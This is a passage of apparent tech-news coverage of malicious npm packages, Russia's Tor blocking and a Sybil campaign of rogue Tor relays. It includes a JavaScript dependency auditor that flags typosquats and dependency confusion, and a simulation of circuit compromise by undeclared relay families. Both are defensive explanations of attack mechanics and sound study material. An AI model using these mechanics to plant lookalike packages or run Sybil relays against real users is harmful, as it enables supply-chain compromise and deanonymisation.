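// Added example: audit a package.json dependency list for two of the patterns the
// article describes: typosquats of popular package names and dependency-confusion
// candidates (internal-looking names that would be fetched from the public registry).
// The allowlist, internal prefix, registry URL and sample manifest are constructed.

// Damerau-Levenshtein (optimal string alignment) distance: single-letter edits and
// adjacent swaps, the slips that typosquatters rely on.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Normalise names the way a hurried reader does: drop scope, separators and case, so
// "discord.js", "discordjs" and "discord_js" collapse to the same string.
function normalize(name) {
  return name.replace(/^@[^/]+\//, '').toLowerCase().replace(/[-_.]/g, '');
}

// Returns the popular package a name appears to imitate, or null. An exact match is
// never a squat; otherwise a name is suspicious if its normalised form equals, or is
// within `maxDistance` edits of, a normalised allowlist entry.
function findTyposquatTarget(name, popular, maxDistance = 1) {
  if (popular.includes(name)) return null;
  const norm = normalize(name);
  for (const p of popular) {
    const pNorm = normalize(p);
    if (norm === pNorm || editDistance(norm, pNorm) <= maxDistance) return p;
  }
  return null;
}

// Dependency confusion: a name in an internal namespace that is not pinned to the
// private registry will be served from the public one if anyone publishes it there.
function isDependencyConfusionCandidate(name, resolvedUrl, internalPrefixes, privateRegistry) {
  const looksInternal = internalPrefixes.some((pfx) => name.startsWith(pfx));
  if (!looksInternal) return false;
  return !resolvedUrl || !resolvedUrl.startsWith(privateRegistry);
}

// Runs both checks over a manifest. `deps` maps name -> version range; `resolved`
// maps name -> tarball URL, as a lockfile records it.
function auditDependencies(deps, resolved, policy) {
  const findings = [];
  for (const name of Object.keys(deps)) {
    const target = findTyposquatTarget(name, policy.popular);
    if (target) findings.push({ name, issue: 'typosquat', target });
    if (isDependencyConfusionCandidate(name, resolved[name], policy.internalPrefixes, policy.privateRegistry)) {
      findings.push({ name, issue: 'dependency-confusion' });
    }
  }
  return findings;
}

// Constructed sample policy and manifest (hypothetical names, not real projects).
const POLICY = {
  popular: ['discord.js', 'express', 'lodash', 'react'],
  internalPrefixes: ['acme-'],
  privateRegistry: 'https://npm.example.internal/',
};
const SAMPLE_DEPS = {
  'discord.js': '^13.0.0',
  'discordjs': '11.5.1',
  'lodahs': '4.17.0',
  'acme-message-broker': '9998.0.0',
  'express': '^4.17.0',
};
const SAMPLE_RESOLVED = {
  'acme-message-broker': 'https://registry.npmjs.org/acme-message-broker/-/acme-message-broker-9998.0.0.tgz',
};

console.log(auditDependencies(SAMPLE_DEPS, SAMPLE_RESOLVED, POLICY));
```

In practice the allowlist would be the most-downloaded npm names and the `resolved` map would be read from `package-lock.json`. A hit is a prompt to inspect, not proof of malice: legitimate forks also sit one edit away from their upstream, which is why the check belongs in review rather than as a hard block.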

As noted earlier, NPM isn’t the only open source repository to be infiltrated with malicious packages. The PyPi repository for Python has seen its share of malware-laden packages, as has RubyGems.

People downloading open source packages should take extra care in making sure the item they’re downloading is legitimate and not malware masquerading as something legitimate. Larger organizations that rely heavily on open source software may find it useful to purchase package management services, which JFrog just happens to sell.


Tor is under threat from Russian censorship and Sybil attacks


The Tor anonymity service and anticensorship tool has come under fire from two threats in recent weeks: The Russian government has blocked most Tor nodes in that country, and hundreds of malicious servers have been relaying traffic.

Russia’s Federal Service for Supervision of Communications, Information Technology, and Mass Media, known as Roskomnadzor, began blocking Tor in the country on Tuesday. The move left Tor users in Russia—said by Tor Project leaders to number about 300,000, or about 15 percent of Tor users—scrambling to find ways to view sites already blocked and to shield their browsing habits from government investigators.

“Illegal content”

Tor Project managers on early Tuesday said some ISPs in Russia began blocking Tor nodes on December 1 and that Roskomnadzor had threatened to block the main Tor site. A few hours later, the Russian government body made good on those threats.

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content,” Roskomnadzor told the AFP news service on Wednesday in explaining the decision. “Today, access to the resource has been restricted.” The censorship body has previously blocked access to many VPNs that had operated in the country.

Tor managers have responded by creating a mirror site that is still reachable in Russia. The managers are also calling on volunteers to create Tor bridges, which are private nodes that allow people to circumvent censorship. The bridges use a transport system known as obfs4, which disguises traffic so it doesn’t appear related to Tor. As of last month, there were about 900 such bridges.

Many default bridges inside Russia are no longer working, Tor said. “We are calling on everyone to spin up a Tor bridge!” project leaders wrote. “If you’ve ever considered running a bridge, now is an excellent time to get started, as your help is urgently needed.”

Sybil attack

Meanwhile, on Tuesday, security news site The Record reported on findings from a security researcher and Tor node operator that a single, anonymous entity had been running huge numbers of malicious Tor relays. At their peak, the relays reached 900. That can be as much as 10 percent of all nodes.

Tor anonymity works by routing traffic through three separate nodes. The first knows the user’s IP address, and the third knows where the traffic is destined. The middle works as a sort of trusted intermediary so that nodes one and three have no knowledge of each other. Running huge numbers of servers has the potential to break those anonymity guarantees, said Matt Green, an encryption and privacy expert at Johns Hopkins University.

“As long as those three nodes aren’t working together and sharing information, Tor can function normally,” he said. “This breaks down when you have one person pretending to be a bunch of nodes. All [the attackers] have to be is in the first hop or the third hop.” He said that when a single entity operates the first and third nodes, it’s easy to infer the information that is supposed to be obfuscated using the middle node.

Such techniques are often known as Sybil attacks, named after the titular character of a 1970 TV mini-series who suffered from dissociative identity disorder and had 16 distinct personalities. Sybil attacks are an impersonation technique that involves a single entity masquerading as a set of nodes by claiming false identities or generating new identities.

Citing a researcher known as Nusenu, The Record said that at one point, there was a 16 percent chance that a user would enter the Tor network through one of the malicious servers. Meanwhile, there was also a 35 percent chance of passing through one of the malicious middle servers and a 5 percent chance of exiting through one of the servers.
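To make the path-selection argument concrete, here is an added example (not Tor Project code) that models it. It takes the per-position fractions the article attributes to Nusenu (16 percent entry, 35 percent middle, 5 percent exit) as the attacker’s bandwidth share in each position and compares two cases: the operator declares the relays as one family, so Tor’s path selection will not place two of them on the same circuit, or leaves the family undeclared, as a Sybil operator does. The relay list, bandwidth weights and random seed are constructed for illustration.

```javascript
// Added example (not Tor Project code): why undeclared Sybil relays undermine the
// three-hop design. Attacker bandwidth shares per position are the figures the
// article attributes to Nusenu: 16% entry, 35% middle, 5% exit. The relay table and
// the seed are constructed for illustration.

// Deterministic PRNG (mulberry32) so the simulation is reproducible.
function mulberry32(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6d2b79f5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296;
  };
}

// Each entry stands for the aggregate bandwidth of one class of relay in one
// position. `family` is what the operator declares in the relay descriptor.
function makeRelays(attackerDeclaresFamily) {
  const fam = attackerDeclaresFamily ? 'sybil-family' : null;
  return [
    { name: 'honest-guards', role: 'guard', bw: 84, malicious: false, family: null },
    { name: 'sybil-guards', role: 'guard', bw: 16, malicious: true, family: fam },
    { name: 'honest-middles', role: 'middle', bw: 65, malicious: false, family: null },
    { name: 'sybil-middles', role: 'middle', bw: 35, malicious: true, family: fam },
    { name: 'honest-exits', role: 'exit', bw: 95, malicious: false, family: null },
    { name: 'sybil-exits', role: 'exit', bw: 5, malicious: true, family: fam },
  ];
}

// Bandwidth-weighted share of a position held by malicious relays.
function attackerShare(relays, role) {
  const pool = relays.filter((r) => r.role === role);
  const total = pool.reduce((s, r) => s + r.bw, 0);
  const bad = pool.filter((r) => r.malicious).reduce((s, r) => s + r.bw, 0);
  return bad / total;
}

// Bandwidth-weighted random choice, mirroring how Tor weights relays by bandwidth.
function weightedPick(relays, rng) {
  const total = relays.reduce((s, r) => s + r.bw, 0);
  let x = rng() * total;
  for (const r of relays) {
    x -= r.bw;
    if (x < 0) return r;
  }
  return relays[relays.length - 1];
}

// Builds one guard/middle/exit circuit. Tor will not place two relays of the same
// declared family on one circuit; a null family never matches anything, so the rule
// cannot help against relays whose operator hides the relationship.
function buildCircuit(relays, rng) {
  const hops = [];
  for (const role of ['guard', 'middle', 'exit']) {
    const candidates = relays.filter(
      (r) => r.role === role && !hops.some((h) => h.family !== null && h.family === r.family)
    );
    hops.push(weightedPick(candidates, rng));
  }
  return hops;
}

// Analytic estimate: with independent per-hop draws the entry and exit shares multiply.
function analyticCompromise(relays) {
  return attackerShare(relays, 'guard') * attackerShare(relays, 'exit');
}

// Monte-Carlo estimate of the fraction of circuits whose entry AND exit are both
// malicious, the condition under which the middle hop no longer hides anything.
function simulateCompromise(circuits, attackerDeclaresFamily, seed) {
  const relays = makeRelays(attackerDeclaresFamily);
  const rng = mulberry32(seed);
  let compromised = 0;
  for (let i = 0; i < circuits; i++) {
    const [entry, , exit] = buildCircuit(relays, rng);
    if (entry.malicious && exit.malicious) compromised++;
  }
  return compromised / circuits;
}

console.log('analytic  (family undeclared):', analyticCompromise(makeRelays(false)).toFixed(4));
console.log('simulated (family undeclared):', simulateCompromise(20000, false, 42).toFixed(4));
console.log('simulated (family declared)  :', simulateCompromise(20000, true, 42).toFixed(4));
```

With the family undeclared, roughly 0.8 percent of circuits (0.16 × 0.05) have the attacker at both ends; with it declared, none do, because the same-family rule keeps the two ends apart. The 35 percent middle share, large as it is, does not enter the calculation, which is the point Green makes about only the first or third hop mattering.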

“A very governmenty thing to do”

Nusenu said the malicious relays date back to 2017, and over the years, the person responsible has regularly added large numbers of them. Typically, the unknown person has operated up to hundreds of servers at any given time. The servers are usually hosted in data centers located all over the world and are mostly configured as entry and middle points.

Tor Project leaders told The Record that Tor removed the nodes as soon as it learned of them.

The researcher said that a variety of factors suggests that the nodes are the work of a well-resourced attacker backed by a nation-state. Green agreed and said the most likely culprit would be China or Russia.

“It sounds like a very governmenty thing to do,” Green said. China and Russia “would have no qualms about actively screwing with Tor.”

Tor users can do several things to minimize the damage resulting from rogue nodes. The first is to use TLS-based encryption for the sending of mail and browsing of websites. Browsing anonymous sites that are within the Tor hidden services network (aka the Dark Web)—as opposed to using Tor to connect to regular Internet sites and servers—isn’t affected by the threat. Unfortunately, this is frequently not an option for people who want to reach sites that have been blocked through censorship.
